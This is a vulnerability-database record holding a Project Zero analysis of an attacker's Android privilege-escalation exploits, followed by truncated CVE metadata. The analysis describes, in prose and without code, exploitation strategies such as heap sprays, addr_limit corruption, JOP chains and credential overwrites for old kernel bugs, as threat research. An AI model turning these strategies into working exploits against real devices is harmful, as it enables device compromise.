{"id": "GOOGLEPROJECTZERO:814DAD5293CFBE484AFB6C0462210E0D", "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nIn-the-Wild Series: Android Exploits\n", "description": "This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Mark Brand, Project Zero\n\nA survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020\n\n## Introduction\n\nAfter one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:\n\n \n[](<https://1.bp.blogspot.com/-KncPHODg-E0/X_4qhFIKe3I/AAAAAAAAano/2kS12oVr5kYjJdSnmpXjf5ZwGlWQ6QdvwCNcBGAsYHQ/s645/android1.png>)\n\n \nEach of the \"xyz_register\" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device. \n\n[](<https://1.bp.blogspot.com/-SmUdaE_FWwQ/X_4qhGqPbhI/AAAAAAAAank/vnlV9gB8Deg9_iaJFXCbZ_tMyfBIKuRQQCNcBGAsYHQ/s914/android2.png>)\n\nLooking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal \"name\" describing the exploit, and those map very neatly to either public naming (\"iovy\", \"cow\") or CVE numbers (\"0569\", \"0820\" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.\n\nIn addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.\n\nOf course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.\n\nAnyway, without further ado let's take a look at the exploits they did fit in here!\n\n## Common Techniques\n\naddr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.\n\nUserspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See [KEEN Lab \"Emerging Defense in Android Kernel\"](<https://keenlab.tencent.com/en/2016/06/01/Emerging-Defense-in-Android-Kernel/>) for more information.\n\nPoint to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See [KEEN Lab \"Emerging Defense in Android Kernel\"](<https://keenlab.tencent.com/en/2016/06/01/Emerging-Defense-in-Android-Kernel/>) for more information.\n\n## iovy\n\nThe vulnerabilities: \n\n[CVE-2015-1805](<https://source.android.com/security/advisory/2016-03-18>) is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.\n\n[CVE-2016-3809](<http://bits-please.blogspot.com/2015/08/effectively-bypassing-kptrrestrict-on.html>) is an information leak, disclosing the address of a kernel sock structure. \n\n\nStrategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.\n\nSubsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.\n\nCopy/Paste: ~90%. The exploit strategy is the same as [public exploit code](<https://github.com/dosomder/iovyroot>), and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.\n\n \nAdditional References: [KEEN Lab \"Talk is Cheap, Show Me the Code\"](<https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code>).\n\n## iovy_pxn2\n\nThe vulnerabilities: Same as iovy, plus: \n[P0-822](<https://bugs.chromium.org/p/project-zero/issues/detail?id=822>) is an information leak, allowing the reading of arbitrary kernel memory.\n\nStrategy: Same as above.\n\nSubsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges. \n \nCopy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).\n\n[](<https://1.bp.blogspot.com/-nIe-I1Ce2Sw/X_4qhMnaH9I/AAAAAAAAans/LvmCIP6JWcA2eogN0pAoBb3s_1gIW8_qACNcBGAsYHQ/s547/android3.png>)\n\n## iovy_pxn3\n\nThe vulnerabilities: Same as iovy.\n\nStrategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either \"read and writev\" or \"write and readv\" threads to get a reusable kernel read-write.\n\nSubsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges. \n\n\nCopy/Paste: ~30%. The heap-spray technique is the same as another [public exploit](<https://github.com/snorez/exploits/blob/master/cve-2015-1805/exp.c>), but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not. \n\n\n## 0569\n\nThe vulnerability: According to the release notes, [CVE-2015-0569](<https://www.codeaurora.org/security-advisory/multiple-issues-in-wlan-driver-allow-local-privilege-escalation-cve-2015-0569-cve-2015-0570-cve-2015-0571>) is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.\n\nStrategy: Corrupt return address; return to userspace shellcode.\n\nSubsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.\n\nCopy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.\n\nAdditional References: [KEEN Lab \"Rooting every Android\".](<https://www.blackhat.com/docs/eu-16/materials/eu-16-Shen-Rooting-Every-Android-From-Extension-To-Exploitation-wp.pdf>)\n\n## 0820\n\nThe vulnerability: [CVE-2016-0820](<https://bugs.chromium.org/p/project-zero/issues/detail?id=678>), a linear data-section overflow resulting from a lack of bounds checking.\n\nStrategy &amp; subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.\n\nCopy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.\n\nAdditional References: [KEEN Lab \"Rooting every Android\".](<https://www.blackhat.com/docs/eu-16/materials/eu-16-Shen-Rooting-Every-Android-From-Extension-To-Exploitation-wp.pdf>)\n\n## COW\n\nThe vulnerability: [CVE-2016-5195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>), also known as DirtyCOW.\n\nStrategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.\n\nSubsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.\n\nCopy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.\n\n## 9568\n\nThe vulnerability: [CVE-2018-9568](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/core/sock.c?id=9d538fa60bad4f7b23193c89e843797a1cf71ef3>), also known as WrongZone.\n\nStrategy &amp; subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.\n\nCopy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.\n\nAdditional References: [Alibaba Security \"From Zero to Root\".](<https://github.com/ThomasKing2014/slides/blob/master/Building%20universal%20Android%20rooting%20with%20a%20type%20confusion%20vulnerability.pdf>) \n[Baidu Security Lab: \"KARMA shows you offense and defense\".](<https://mp.weixin.qq.com/s?__biz=MzA3NTQ3ODI0NA==&mid=2247485060&idx=1&sn=b3773b0478f7b5ee39fa1a6527b4f3ff>)\n\n## Conclusion\n\nNothing very interesting, which is interesting in itself!\n\nHere is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.\n\nIt certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.\n\nOne explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a \"low-value\" privilege-elevation capability. Alternatively, perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?\n\nBased on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.\n\nAbout the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.\n\nThis is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 5: Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>). \n \n\n", "published": "2021-01-12T00:00:00", "modified": "2021-01-12T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2015-0569", "CVE-2015-0570", "CVE-2015-0571", "CVE-2015-1805", "CVE-2016-0820", "CVE-2016-3809", "CVE-2016-5195", "CVE-2018-9568"], "lastseen": "2021-01-13T07:23:57", "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "android", "idList": ["ANDROID:CVE-2016-0820", "ANDROID:CVE-2015-1805", "ANDROID:PIPE_INATOMIC", "ANDROID:CVE-2016-5195", "ANDROID:CVE-2015-0569", "ANDROID:CVE-2015-0570"]}, {"type": "cve", "idList": ["CVE-2015-1805", "CVE-2016-5195", "CVE-2016-0820", "CVE-2015-0569", "CVE-2015-0570", "CVE-2016-3809", "CVE-2015-0571", "CVE-2018-9568"]}, {"type": "attackerkb", "idList": ["AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20151124-01-SMARTPHONE", "HUAWEI-SA-20161207-01-DIRTYCOW"]}, {"type": "f5", "idList": ["SOL10558632", "F5:K10558632", "F5:K17458", "SOL17458"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123109", "OPENVAS:1361412562310882189", "OPENVAS:1361412562310871365", "OPENVAS:1361412562310842922", "OPENVAS:1361412562310842923", "OPENVAS:1361412562310123108", "OPENVAS:1361412562310842920", "OPENVAS:1361412562310842924", "OPENVAS:1361412562310842974", "OPENVAS:1361412562310105417"]}, {"type": "thn", "idList": ["THN:1F1264BE105BBA74057A5E702B33D71F", "THN:B571C1AAA8CDDC10150ABA0BF22B19E6"]}, {"type": "exploitdb", "idList": ["EDB-ID:39308", "EDB-ID:40616", "EDB-ID:40847"]}, {"type": "zdt", "idList": ["1337DAY-ID-26429", "1337DAY-ID-25771", "1337DAY-ID-26430", "1337DAY-ID-25952"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135372", "PACKETSTORM:139922"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2015-1211.NASL", "REDHAT-RHSA-2015-1042.NASL", "SL_20150602_KERNEL_ON_SL5_X.NASL", "F5_BIGIP_SOL17458.NASL", "VIRTUOZZO_VZA-2018-086.NASL", "REDHAT-RHSA-2015-1120.NASL", "ORACLELINUX_ELSA-2015-1042.NASL", "REDHAT-RHSA-2015-1190.NASL", "SUSE_SU-2018-4196-1.NASL", "CENTOS_RHSA-2015-1042.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1042", "ELSA-2015-1042-1", "ELSA-2016-3632"]}, {"type": "centos", "idList": ["CESA-2015:1042", "CESA-2016:2098"]}, {"type": "redhat", "idList": ["RHSA-2015:1120", "RHSA-2015:1042", "RHSA-2015:1190", "RHSA-2016:2126", "RHSA-2016:2120", "RHSA-2015:1211", "RHSA-2016:2106"]}, {"type": "threatpost", "idList": ["THREATPOST:AF1B767CD9BF9276A4427C90B4CEAA8D", "THREATPOST:E5B29B24D99DF66802D64661812BCFB9", "THREATPOST:D28C91D0999C5EDFA9FCD89F6C95B17D"]}, {"type": "virtuozzo", "idList": ["VZA-2018-086", "VZA-2018-088", "VZA-2018-087"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2593-1", "SUSE-SU-2016:2592-1", "SUSE-SU-2016:2585-1", "SUSE-SU-2016:2657-1"]}, {"type": "seebug", "idList": ["SSV:92488", "SSV:96908"]}, {"type": "saint", "idList": ["SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183"]}, {"type": "ubuntu", "idList": ["USN-3105-2", "USN-3104-1", "USN-3106-2", "USN-3107-2"]}, {"type": "cisco", "idList": ["CISCO-SA-20161026-LINUX"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0003"]}, {"type": "vmware", "idList": ["VMSA-2016-0018"]}], "modified": "2021-01-13T07:23:57", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-13T07:23:57", "rev": 2}, "vulnersScore": 6.8}}

{"android": [{"lastseen": "2020-06-22T14:42:13", "bulletinFamily": "software", "cvelist": ["CVE-2015-0570"], "description": "Stack-based buffer overflow in the SET_WPS_IE IOCTL implementation in wlan_hdd_hostapd.c in the WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via a crafted application that uses a long WPS IE element.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-05-01T00:00:00", "id": "ANDROID:CVE-2015-0570", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2015-0570.html", "title": "CVE-2015-0570", "type": "android", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T14:42:13", "bulletinFamily": "software", "cvelist": ["CVE-2015-0569"], "description": "Heap-based buffer overflow in the private wireless extensions IOCTL implementation in wlan_hdd_wext.c in the WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via a crafted application that establishes a packet filter.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-05-01T00:00:00", "id": "ANDROID:CVE-2015-0569", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2015-0569.html", "title": "CVE-2015-0569", "type": "android", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T13:21:10", "bulletinFamily": "software", "cvelist": ["CVE-2016-0820"], "description": "The MediaTek Wi-Fi kernel driver in Android 6.0.1 before 2016-03-01 allows attackers to gain privileges via a crafted application, aka internal bug 26267358.", "edition": 2, "modified": "2019-07-29T00:00:00", "published": "2016-03-01T00:00:00", "id": "ANDROID:CVE-2016-0820", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-0820.html", "title": "CVE-2016-0820", "type": "android", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T13:21:08", "bulletinFamily": "software", "cvelist": ["CVE-2015-1805"], "description": "The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an \"I/O vector array overrun.\"", "edition": 2, "modified": "2019-07-29T00:00:00", "published": "2016-04-02T00:00:00", "id": "ANDROID:CVE-2015-1805", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2015-1805.html", "title": "CVE-2015-1805", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-5195", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-5195.html", "title": "CVE-2016-5195", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T13:21:11", "bulletinFamily": "software", "cvelist": ["CVE-2015-1805"], "description": "The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an 'I/O vector array overrun.'\nThis is a known issue in the upstream Linux kernel that was fixed in April 2014 but wasn\u2019t called out as a security fix and assigned CVE-2015-1805 until February 2, 2015. On February 19, 2016, C0RE Team notified Google that the issue could be exploited on Android and a patch was developed to be included in an upcoming regularly scheduled monthly update. On March 15, 2016 Google received a report from Zimperium that this vulnerability had been abused on a Nexus 5 device. Google has confirmed the existence of a publicly available rooting application that abuses this vulnerability on Nexus 5 and Nexus 6 to provide the device user with root privileges.", "edition": 2, "modified": "2016-03-21T00:00:00", "published": "2015-06-06T00:00:00", "id": "ANDROID:PIPE_INATOMIC", "href": "http://www.androidvulnerabilities.org/vulnerabilities/pipe_inatomic.html", "title": "pipe inatomic", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:21:20", "description": "Stack-based buffer overflow in the SET_WPS_IE IOCTL implementation in wlan_hdd_hostapd.c in the WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via a crafted application that uses a long WPS IE element.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-05-09T10:59:00", "title": "CVE-2015-0570", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0570"], "modified": "2020-07-31T18:51:00", "cpe": ["cpe:/o:linux:linux_kernel:4.20.15", "cpe:/o:linux:linux_kernel:3.19.8"], "id": "CVE-2015-0570", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.19.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:20", "description": "The WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not verify authorization for private SET IOCTL calls, which allows attackers to gain privileges via a crafted application, related to wlan_hdd_hostapd.c and wlan_hdd_wext.c.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-05-09T10:59:00", "title": "CVE-2015-0571", "type": "cve", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0571"], "modified": "2020-07-31T18:56:00", "cpe": ["cpe:/o:linux:linux_kernel:4.20.15", "cpe:/o:linux:linux_kernel:3.18.66"], "id": "CVE-2015-0571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0571", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.18.66:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The networking component in Android before 2016-07-05 on Android One, Nexus 5, Nexus 5X, Nexus 6, Nexus 6P, Nexus 7 (2013), Nexus 9, Nexus Player, and Pixel C devices allows attackers to obtain sensitive information via a crafted application, aka internal bug 27532522.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-11T02:00:00", "title": "CVE-2016-3809", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3809"], "modified": "2016-07-12T17:57:00", "cpe": ["cpe:/o:google:android:6.0.1"], "id": "CVE-2016-3809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3809", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:20", "description": "Heap-based buffer overflow in the private wireless extensions IOCTL implementation in wlan_hdd_wext.c in the WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via a crafted application that establishes a packet filter.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-05-09T10:59:00", "title": "CVE-2015-0569", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0569"], "modified": "2020-07-31T18:45:00", "cpe": ["cpe:/o:linux:linux_kernel:4.20.15", "cpe:/o:linux:linux_kernel:3.19.8"], "id": "CVE-2015-0569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0569", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.19.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:43", "description": "In sk_clone_lock of sock.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-113509306. References: Upstream kernel.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-06T14:29:00", "title": "CVE-2018-9568", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9568"], "modified": "2020-10-15T13:28:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:google:android:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-9568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9568", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", 